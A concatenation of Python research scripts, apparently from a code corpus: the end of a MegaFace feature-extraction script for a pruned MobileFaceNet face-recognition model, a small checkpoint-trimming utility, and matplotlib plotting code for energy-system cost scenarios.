# check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/'
# 'pytorch_pruned0.25_r34_lr0.01_checkpoint26_feature-result_fliped/checkpoint_026.pth')
# iccv_ms1m_mobilefacenet_baseline_two_stage_fliped
# megaface_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/pytorch_mobilefacenet_baseline_two_stage_checkpoint31/feature_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/pytorch_mobilefacenet_baseline_two_stage_checkpoint31/feature_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/liujing/NFS/ICCV_challenge/xz_log/iccv_emore_log_gdc/baseline/mobilefacenet/'
# '2stage/dim128/stage2/log_aux_mobilefacenetv2_baseline_128_arcface_iccv_emore_bs200_e36_lr0.100_'
# 'step[15, 25, 31]_kaiming_init_auxnet_arcface_new_op_stage2_20190726/check_point/checkpoint_031.pth')
# iccv_emore: new_mobilefacenet_p0.5_without_fc_fliped
# megaface_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/pytorch_mobilefacenet_p0.5_without_p_fc_checkpoint35/feature_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/pytorch_mobilefacenet_p0.5_without_p_fc_checkpoint35/feature_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/liujing/NFS/ICCV_challenge/xz_log/iccv_emore_log_gdc/baseline/mobilefacenet/'
# '2stage/dim128/finetune/log_aux_mobilefacenetv2_baseline_128_arcface_iccv_emore_bs512_e36_lr0.010_'
# 'step[15, 25, 31]_p0.5_bs512_cosine_finetune_without_fc_20190809/check_point/checkpoint_035.pth')
# iccv: new_mobilefacenet_p0.25_without_fc_fliped
# megaface_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/pytorch_mobilefacenet_p0.25_without_p_fc_checkpoint34/feature_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/pytorch_mobilefacenet_p0.25_without_p_fc_checkpoint34/feature_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/liujing/NFS/ICCV_challenge/xz_log/iccv_emore_log_gdc/baseline/mobilefacenet/2stage/dim128/'
# 'finetune/log_aux_mobilefacenetv2_baseline_128_arcface_iccv_emore_bs200_e36_lr0.010_step[15, 25, 31]'
# '_p0.25_bs512_cosine_finetune_20190820/check_point/checkpoint_034.pth')
# guoyong: mobilefacenet_2stage_noauxnet
# megaface_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/guoyong/pytorch_mobilefacenet_noauxnet_checkpoint35_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/guoyong/pytorch_mobilefacenet_noauxnet_checkpoint35_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/liujing/NFS/ICCV_challenge/xz_log/iccv_emore_log_gdc/baseline/mobilefacenet/2stage/dim128/auxnet_non_auxnet/stage2/log_aux_mobilefacenetv2_baseline_128_arcface_iccv_emore_bs200_e36_lr0.100_step[15, 25, 31]_kaiming_init_arcface_new_op_nowarmup_nolabelsmooth_resume2_20190831/check_point/checkpoint_035.pth')
# guoyong: mobilefacenet_2stage_auxnet
# megaface_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/guoyong/pytorch_mobilefacenet_auxnet_checkpoint35_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/guoyong/pytorch_mobilefacenet_auxnet_checkpoint35_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/liujing/NFS/ICCV_challenge/xz_log/iccv_emore_log_gdc/baseline/mobilefacenet/2stage/dim128/auxnet_non_auxnet/stage2/log_aux_mobilefacenetv2_baseline_128_softmax-arcface_iccv_emore_bs384_e36_lr0.100_step[15, 25, 31]_kaiming_init_auxnet_n2_arcface_new_op_nowarmup_nolabelsmooth_stage2_resume_20190829/check_point/checkpoint_035.pth')
# iccv_emore: new_mobilefacenet_p0.5_without_fc_fliped + s=128_finetune
# megaface_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/' \
# 'pytorch_mobilefacenet_p0.5_without_p_fc_checkpoint35_s128_second_finetune_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/iccv_ms1m_result/' \
# 'pytorch_mobilefacenet_p0.5_without_p_fc_checkpoint35_s128_second_finetune_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/liujing/NFS/ICCV_challenge/xz_log/iccv_emore_log_gdc/baseline/mobilefacenet/2stage/dim128/finetune/s128_second_finetune/log_aux_mobilefacenetv2_baseline_0.5width_128_arcface_iccv_emore_bs512_e24_lr0.001_step[]_bs512_cosine_88.26_second_s128_finetune_20190829/check_point/checkpoint_023.pth')
# ms1mv2: mobilefacenet_prun_adapt
megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/' \
'pytorch_mobilefacenet_without_p_fc_adapt_checkpoint22_s128_fliped/' \
'fp_megaface_112x112_norm_features'
facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/' \
'pytorch_mobilefacenet_without_p_fc_adapt_checkpoint22_s128_fliped/' \
'fp_facescrub_112x112_norm_features'
check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/checkpoint_022.pth', map_location=torch.device('cpu'))
print("megaface_out = ", megaface_out)
print("facescrub_out = ", facescrub_out)
# model = MobileFaceNet() # old: mobilefacenet_v1
# model = resnet34() # r34
# model = pruned_Mobilefacenet(pruning_rate=0.25) # old
# model = pruned_Mobilefacenet(pruning_rate=0.5) # old
# mobilefacenet_adapt
f = open('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/model.txt', 'rb')
model = pickle.load(f)
# model = LResNet34E_IR()
# model = pruned_LResNet34E_IR(pruning_rate=0.3)
# model = pruned_LResNet34E_IR(pruning_rate=0.5)
# model = pruned_LResNet34E_IR(pruning_rate=0.25)
# new_model
# model = Mobilefacenetv2_v3_width(embedding_size=512, width_mult=1.315)
# model = Mobilefacenetv2_v3_width(embedding_size=128, width_mult=1.0)
# model = Mobilefacenetv2_width_wm(embedding_size=128, pruning_rate=0.5) # liujing
# model = Mobilefacenetv2_width_wm(embedding_size=128, pruning_rate=0.25) # liujing
model_state = check_point_params['model']
print(model)
model.load_state_dict(model_state)
print("model load success !!!")
# torch.save(model_state, '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/'
# 'pytorch_pruned0.25_r34_lr0.01_checkpoint26_feature-result_fliped/'
# 'p0.25_r34_lr0.01_checkpoint26.pth')
model = model.cuda()
model.eval()
if args.skip == 0:
i = 0
succ = 0
print("get facescrub features start!")
for line in open(facescrub_lst, 'r'):
if i % 1000 == 0:
print("writing facescrub", i, succ)
print('i=', str(i))
image_path, label, bbox, landmark, aligned = parse_lst_line(line)
_path = image_path.split('/')
a, b = _path[-2], _path[-1]
out_dir = os.path.join(facescrub_out, a)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
image_path = get_image_path(image_path, dataset_path, "MegaFace/")
print(image_path)
feature = get_feature(image_path, model, image_shape, args.use_flip)
out_path = os.path.join(out_dir, b + "_%s_%dx%d.bin" % (args.algo, image_shape[1], image_shape[2]))
write_bin(out_path, feature)
succ += 1
i += 1
print('facescrub finish!', i, succ)
# return
if args.mf == 0:
return
i = 0
succ = 0
batch_count = 0
image_path_list = []
print("get megaface features start!")
for line in open(megaface_lst, 'r'):
if i % 1000 == 0:
print("writing megaface", i, succ)
print('i={}, succ={}'.format(i, succ))
image_path, label, bbox, landmark, aligned = parse_lst_line(line)
image_path_list.append(image_path)
if (i + 1) % args.batch_size == 0:
batch_count += 1
print("batch count={}".format(batch_count))
count = process_batch_feature(args, image_path_list, megaface_out,
dataset_path, model, image_shape, args.use_flip)
succ += count
image_path_list = []
# continue
# break
# succ += 1
i += 1
# if batch_count == 2:
# break
# for last batch
if len(image_path_list) != 0:
count = process_batch_feature(args, image_path_list, megaface_out, dataset_path,
model, image_shape, args.use_flip)
succ += count
print('mf stat', i, succ)
print(args)
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, help='', default=64)
parser.add_argument('--image_size', type=str, help='', default='3,112,112')
parser.add_argument('--skip', type=int, help='', default=0)
parser.add_argument('--mf', type=int, help='', default=1)
# parser.add_argument('--algo', type=str, help='', default='mobilefacenetNcnn')
parser.add_argument('--algo', type=str, help='', default='mobilefacenetPytorch')
# parser.add_argument('--algo', type=str, help='', default='r34Pytorch')
parser.add_argument('--gpu', type=str, help='gpu', default='1')
parser.add_argument('--use_flip', type=bool, help='use_flip', default=True)
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
| CN1Ember/feathernet_mine | quan_table/insightface_v2/megaface/fast_gen_megaface_pytorch_flip.py | fast_gen_megaface_pytorch_flip.py | py | 22,020 | python | en | code | 1 | github-code | 13 |
31767138079 | # cut the embed head in current pth file
import os
import torch
path = "ArT_mid/MixNet_FSNet_M_160.pth"
cpt = torch.load(path)
model_cpt = cpt["model"]
print(model_cpt.keys())
keys_list = list(model_cpt.keys())
for key in keys_list:
if "embed_" in key:
model_cpt.pop(key)
print(model_cpt.keys())
cpt["model"] = model_cpt
torch.save(cpt, "MixNet_FSNet_M_160.pth") | D641593/MixNet | model/cut_pth.py | cut_pth.py | py | 380 | python | en | code | 26 | github-code | 13 |
72396604499 | import numpy as np
import pickle, os
from scipy import stats
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import scipy.stats as st
if __name__ == "__main__":
base_to_PGP = -999
base_from_PGP = -999
"""
def plot_cost(CurrentCase, ylist_type, default_case_name):
ax = plt.subplot(111)
if ylist_type == 'PGP':
x_axis = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix']),
np.array(CurrentCase['to_PGP_fix']) + np.array(CurrentCase['PGP_storage_fix']) + np.array(CurrentCase['from_PGP_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink', 'lightgreen']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(0.1, 1)
# ax.set_xscale('log', basex=10)
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
if ylist_type == 'DAC':
x_axis = [0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix']),
np.array(CurrentCase['dac_tot'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink', 'lightgreen']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(0.01, 1)
ax.set_xscale('log', basex=10)
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
if ylist_type == 'demand':
xlist = np.array([100, 98, 96, 94, 92, 90, 88, 86, 84, 82, 80, 78, 76, 74, 72, 70, 68, 66, 64, 62, 60, 58, 56, 54, 52, 50, 48, 46, 44, 42,
40, 38, 36, 34, 32, 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2, 1, 0.1, 0.01, 0])/100
x_axis = 1 - 0.5**( np.log(xlist)/np.log(0.2) )
xticks_addition_org = np.array([50.0, 10.0, 1.0])/100
xticks_addition_cov = 1 - 0.5**( np.log(xticks_addition_org)/np.log(0.2) )
xticks = np.r_[[0, 0.5, 0.75, 1.0], xticks_addition_cov]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('Emissions reduction constration (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( xticks )
ax.set_xticklabels( ['0', '80', '96', '100', '50', '90', '99'] )
ax.set_xlim(0, 1)
ax.set_ylim(0, 0.14)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
if ylist_type == 'GeoCap':
x_axis = np.array([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5])
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlim(0, 1.5)
ax.set_ylim(0, 0.10)
plt.show()
# plt.savefig(default_case_name+'.ps')
plt.clf()
with open('Cost_Uncertainty_PGP_scale.pickle', 'rb') as handle:
table_dispatch_ToPGP, table_dispatch_FromPGP, table_dispatch_AllPGP = pickle.load(handle)
# # plot_cost(table_dispatch_ToPGP[0], 'PGP', 'tPGP2019')
# plot_cost(table_dispatch_ToPGP[1], 'PGP', 'tPGP2050_sub0')
# plot_cost(table_dispatch_ToPGP[2], 'PGP', 'tPGP2050_sub1')
# plot_cost(table_dispatch_ToPGP[3], 'PGP', 'tPGP2050_sub2')
# plot_cost(table_dispatch_ToPGP[4], 'PGP', 'tPGP2050_sub3')
# plot_cost(table_dispatch_ToPGP[5], 'PGP', 'tPGP2050_sub4')
# # plot_cost(table_dispatch_FromPGP[0], 'PGP', 'fPGP2019')
# plot_cost(table_dispatch_FromPGP[1], 'PGP', 'fPGP2050_sub0')
# plot_cost(table_dispatch_FromPGP[2], 'PGP', 'fPGP2050_sub1')
# plot_cost(table_dispatch_FromPGP[3], 'PGP', 'fPGP2050_sub2')
# plot_cost(table_dispatch_FromPGP[4], 'PGP', 'fPGP2050_sub3')
# plot_cost(table_dispatch_FromPGP[5], 'PGP', 'fPGP2050_sub4')
# # plot_cost(table_dispatch_AllPGP[0], 'PGP', 'aPGP2019')
# plot_cost(table_dispatch_AllPGP[1], 'PGP', 'aPGP2050_sub0')
# plot_cost(table_dispatch_AllPGP[2], 'PGP', 'aPGP2050_sub1')
# plot_cost(table_dispatch_AllPGP[3], 'PGP', 'aPGP2050_sub2')
# plot_cost(table_dispatch_AllPGP[4], 'PGP', 'aPGP2050_sub3')
# plot_cost(table_dispatch_AllPGP[5], 'PGP', 'aPGP2050_sub4')
with open('Cost_Uncertainty_Dac_scale.pickle', 'rb') as handle:
table_dispatch_DAC = pickle.load(handle)
# plot_cost(table_dispatch_DAC[0], 'DAC', 'DAC2019')
# plot_cost(table_dispatch_DAC[1], 'DAC', 'DAC2050_sub0')
# plot_cost(table_dispatch_DAC[2], 'DAC', 'DAC2050_sub1')
# plot_cost(table_dispatch_DAC[3], 'DAC', 'DAC2050_sub2')
# plot_cost(table_dispatch_DAC[4], 'DAC', 'DAC2050_sub3')
# plot_cost(table_dispatch_DAC[5], 'DAC', 'DAC2050_sub4')
with open('Cost_Uncertainty_Demand.pickle', 'rb') as handle:
Table_ESF2050, Table_square = pickle.load(handle)
# plot_cost(Table_ESF2050[0], 'demand', 'ESF2050_2019')
# plot_cost(Table_ESF2050[1], 'demand', 'ESF2050_2050_sub0')
# plot_cost(Table_ESF2050[2], 'demand', 'ESF2050_2050_sub1')
# plot_cost(Table_ESF2050[3], 'demand', 'ESF2050_2050_sub2')
# plot_cost(Table_ESF2050[4], 'demand', 'ESF2050_2050_sub3')
# plot_cost(Table_ESF2050[5], 'demand', 'ESF2050_2050_sub4')
# plot_cost(Table_square[0], 'demand', 'square_2019')
# plot_cost(Table_square[1], 'demand', 'square_2050_sub0')
# plot_cost(Table_square[2], 'demand', 'square_2050_sub1')
# plot_cost(Table_square[3], 'demand', 'square_2050_sub2')
# plot_cost(Table_square[4], 'demand', 'square_2050_sub3')
# plot_cost(Table_square[5], 'demand', 'square_2050_sub4')
# with open('Cost_Uncertainty_GeoCapLimit.pickle', 'rb') as handle:
# table_dispatch_GeoCap = pickle.load(handle)
# plot_cost(table_dispatch_GeoCap[0], 'GeoCap', 'ER10')
# plot_cost(table_dispatch_GeoCap[1], 'GeoCap', 'ER1')
# plot_cost(table_dispatch_GeoCap[2], 'GeoCap', 'ER0')
# """
"""
color_colors = {'natgas': 'black', 'natgas_ccs': 'grey', 'biopower': 'lightslategrey',
'solar': 'wheat', 'wind': 'skyblue', 'offwind': 'darkblue',
'nuclear': 'tomato', 'geothermal': 'darkred',
'storage': 'lightpink', 'pgp': 'lightgreen'}
def system_cost_distribution(table_in):
bin_edges = list(np.arange(0.05, 0.101, 0.001))
tech_list_Full = ['solar', 'wind', 'offwind', 'geothermal', 'storage']
system_cost = np.array(table_in['system_cost'])
cost_tables = table_in['cost']
for tech_idx in tech_list_Full:
tech_cap = np.array(table_in[tech_idx+'_cap'])
tech_fixed_cost = np.array(cost_tables[tech_idx+'_fix'])
tech_fixed_cost_unique = np.unique(tech_fixed_cost)
if len(tech_fixed_cost_unique) == 3:
list_1, list_2, list_3 = [], [], []
caps_1, caps_2, caps_3 = [], [], []
for idx in range(len(tech_fixed_cost)):
if tech_fixed_cost[idx] == tech_fixed_cost_unique[0]: list_1.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[1]: list_2.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[2]: list_3.append(system_cost[idx])
ax1 = plt.subplot(111)
x_axis = np.arange(0.05, 0.101, 0.001)
try:
kde_L = st.gaussian_kde(list_1); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_L.pdf(x_axis)*0.001, facecolor='#fdf289', edgecolor='#fdf289', linestyle='--', linewidth=0.8, alpha=0.5, label='L')
except:
print ('no L')
try:
kde_M = st.gaussian_kde(list_2); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_M.pdf(x_axis)*0.001, facecolor='#46edc8', edgecolor='#46edc8', linestyle='--', linewidth=0.8, alpha=0.5, label='M')
except:
print ('no M')
try:
kde_H = st.gaussian_kde(list_3); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_H.pdf(x_axis)*0.001, facecolor='#374d7c', edgecolor='#374d7c', linestyle='--', linewidth=0.8, alpha=0.5, label='H')
except:
print ('no H')
ax1 = plt.subplot(111)
ax1.boxplot(caps_1, positions=[1], widths=0.6, medianprops=dict(color=color_colors[tech_idx]))
ax1.boxplot(caps_2, positions=[2], widths=0.6, medianprops=dict(color=color_colors[tech_idx]))
ax1.boxplot(caps_3, positions=[3], widths=0.6, medianprops=dict(color=color_colors[tech_idx]))
ax1.set_xlim(0.05, 0.1)
ax1.set_ylim(0, 0.15)
# plt.show()
plt.savefig(f'panel_low_{tech_idx}.ps')
plt.clf()
# with open('Cost_Uncertainty_GeoCapEnsemble.pickle', 'rb') as handle:
# Table_scenario2050_GeoCap = pickle.load(handle)
# system_cost_distribution(Table_scenario2050_GeoCap[0])
# system_cost_distribution(Table_scenario2050_GeoCap[1])
# system_cost_distribution(Table_scenario2050_GeoCap[2])
# """
"""
def plot_transient(CurrentCase, default_case_name):
ax = plt.subplot(111)
x_axis = np.arange(2019, 2051, 1)
y_lists = [np.array(CurrentCase['natgas_tot']) + np.array(CurrentCase['natgas_fixed_tot']),
np.array(CurrentCase['natgas_ccs_tot']) + np.array(CurrentCase['natgas_ccs_fixed_tot']),
np.array(CurrentCase['biopower_tot']) + np.array(CurrentCase['biopower_fixed_tot']),
np.array(CurrentCase['solar_fix']) + np.array(CurrentCase['solar_fixed_fix']),
np.array(CurrentCase['wind_fix']) + np.array(CurrentCase['wind_fixed_fix']),
np.array(CurrentCase['offwind_fix']) + np.array(CurrentCase['offwind_fixed_fix']),
np.array(CurrentCase['nuclear_fix']) + np.array(CurrentCase['nuclear_fixed_fix']),
np.array(CurrentCase['geothermal_fix']) + np.array(CurrentCase['geothermal_fixed_fix']),
np.array(CurrentCase['storage_fix']) + np.array(CurrentCase['storage_fixed_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(2019, 2050)
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
def plot_right_panel_bar(CurrentCase, type, name):
ax = plt.subplot(111)
bot = 0
if type == 0:
ax.bar(0, np.array(CurrentCase['natgas_tot'][-1]) + np.array(CurrentCase['natgas_fixed_tot'][-1]), bottom = bot, color='black'); bot = bot + CurrentCase['natgas_tot'][-1] + np.array(CurrentCase['natgas_fixed_tot'][-1])
ax.bar(0, np.array(CurrentCase['natgas_ccs_tot'][-1]) + np.array(CurrentCase['natgas_ccs_fixed_tot'][-1]), bottom = bot, color='grey'); bot = bot + CurrentCase['natgas_ccs_tot'][-1] + np.array(CurrentCase['natgas_ccs_fixed_tot'][-1])
ax.bar(0, np.array(CurrentCase['biopower_tot'][-1]) + np.array(CurrentCase['biopower_fixed_tot'][-1]), bottom = bot, color='lightslategrey'); bot = bot + CurrentCase['biopower_tot'][-1] + np.array(CurrentCase['biopower_fixed_tot'][-1])
ax.bar(0, np.array(CurrentCase['solar_fix'][-1]) + np.array(CurrentCase['solar_fixed_fix'][-1]), bottom = bot, color='wheat'); bot = bot + CurrentCase['solar_fix'][-1] + np.array(CurrentCase['solar_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['wind_fix'][-1]) + np.array(CurrentCase['wind_fixed_fix'][-1]), bottom = bot, color='skyblue'); bot = bot + CurrentCase['wind_fix'][-1] + np.array(CurrentCase['wind_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['offwind_fix'][-1]) + np.array(CurrentCase['offwind_fixed_fix'][-1]), bottom = bot, color='darkblue'); bot = bot + CurrentCase['offwind_fix'][-1] + np.array(CurrentCase['offwind_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['nuclear_fix'][-1]) + np.array(CurrentCase['nuclear_fixed_fix'][-1]), bottom = bot, color='tomato'); bot = bot + CurrentCase['nuclear_fix'][-1] + np.array(CurrentCase['nuclear_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['geothermal_fix'][-1]) + np.array(CurrentCase['geothermal_fixed_fix'][-1]), bottom = bot, color='brown'); bot = bot + CurrentCase['geothermal_fix'][-1] + np.array(CurrentCase['geothermal_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['storage_fix'][-1]) + np.array(CurrentCase['storage_fixed_fix'][-1]), bottom = bot, color='lightpink'); bot = bot + CurrentCase['storage_fix'][-1] + np.array(CurrentCase['storage_fixed_fix'][-1])
if type == 1:
ax.bar(0, np.array(CurrentCase['natgas_tot'][-1]), bottom = bot, color='black'); bot = bot + CurrentCase['natgas_tot'][-1]
ax.bar(0, np.array(CurrentCase['natgas_ccs_tot'][-1]), bottom = bot, color='grey'); bot = bot + CurrentCase['natgas_ccs_tot'][-1]
ax.bar(0, np.array(CurrentCase['biopower_tot'][-1]), bottom = bot, color='lightslategrey'); bot = bot + CurrentCase['biopower_tot'][-1]
ax.bar(0, np.array(CurrentCase['solar_fix'][-1]), bottom = bot, color='wheat'); bot = bot + CurrentCase['solar_fix'][-1]
ax.bar(0, np.array(CurrentCase['wind_fix'][-1]), bottom = bot, color='skyblue'); bot = bot + CurrentCase['wind_fix'][-1]
ax.bar(0, np.array(CurrentCase['offwind_fix'][-1]), bottom = bot, color='darkblue'); bot = bot + CurrentCase['offwind_fix'][-1]
ax.bar(0, np.array(CurrentCase['nuclear_fix'][-1]), bottom = bot, color='tomato'); bot = bot + CurrentCase['nuclear_fix'][-1]
ax.bar(0, np.array(CurrentCase['geothermal_fix'][-1]), bottom = bot, color='brown'); bot = bot + CurrentCase['geothermal_fix'][-1]
ax.bar(0, np.array(CurrentCase['storage_fix'][-1]), bottom = bot, color='lightpink'); bot = bot + CurrentCase['storage_fix'][-1]
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(name+'.ps')
plt.clf()
# with open('Cost_Uncertainty_Transient.pickle', 'rb') as handle:
# Table_Transient = pickle.load(handle)
# with open('Cost_Uncertainty_Scenario2050_spe.pickle', 'rb') as handle:
# Table_Scenario2050_Full_sub0_AllL, Table_Scenario2050_Full_sub1_GeoL, Table_Scenario2050_Full_sub2_AllH = pickle.load(handle)
# plot_transient(Table_Transient[0], 'transient_sub0')
# plot_transient(Table_Transient[1], 'transient_sub1')
# plot_transient(Table_Transient[2], 'transient_sub2')
# plot_right_panel_bar(Table_Scenario2050_Full_sub2_AllH[3], 1, 'bar_allH')
# plot_right_panel_bar(Table_Scenario2050_Full_sub1_GeoL[3], 1, 'bar_GeoL')
# plot_right_panel_bar(Table_Scenario2050_Full_sub0_AllL[3], 1, 'bar_allL')
# plot_right_panel_bar(Table_Transient[0], 0, 'bar_allH')
# plot_right_panel_bar(Table_Transient[1], 0, 'bar_GeoL')
# plot_right_panel_bar(Table_Transient[2], 0, 'bar_allL')
# """
"""
# Load-shifting
def cal_plot(CurrentCase, type, vc):
ax = plt.subplot(111)
if type == 'stack':
x_axis = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix']),
np.array(CurrentCase['load_shift_tot'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink', 'lightgreen']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(0.1, 1)
ax.set_xscale('log', basex=10)
